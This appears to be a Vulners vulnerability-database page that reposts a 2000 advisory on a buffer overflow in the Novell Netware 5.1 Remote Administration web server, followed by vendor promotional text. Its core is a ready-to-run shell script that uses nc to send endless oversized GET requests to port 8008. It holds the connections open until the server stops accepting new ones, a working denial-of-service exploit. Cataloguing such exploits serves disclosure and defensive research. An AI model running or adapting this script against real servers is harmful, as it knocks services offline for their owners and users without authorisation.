Vulners
Lucene search
Novell Netware 5.1 - Remote Administration Buffer Overflow
source: https://www.securityfocus.com/bid/1118/info
The Netware Remote Administration utility can be compromised to allow arbitrary code to be remotely run on the server.
The Remote Administration server is basically a simple webserver, and if sent a GET request of between 4 and 8 kb, some of the data gets written to executable registers.
Even without executable code being sent, this can lead to a DoS as although the server will not crash, the connection will not be aborted or cleaned. Therefore, these failed requests can be made repeatedly until the TCP/IP subsystem will no longer accept connection requests.
#!/bin/sh
SERVER=127.0.0.1
PORT=8008
WAIT=3
DUZOA=`perl -e '{print "A"x4093}'`
MAX=30
while :; do
ILE=0
while [ $ILE -lt $MAX ]; do
(
(
echo "GET /"
echo $DUZOA
echo
) | nc $SERVER $PORT &
sleep $WAIT
kill -9 $!
) &>/dev/null &
ILE=$[ILE+1]
done
sleep $WAIT
doneData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Apr 2000 00:00Current
7High risk
Vulners AI Score7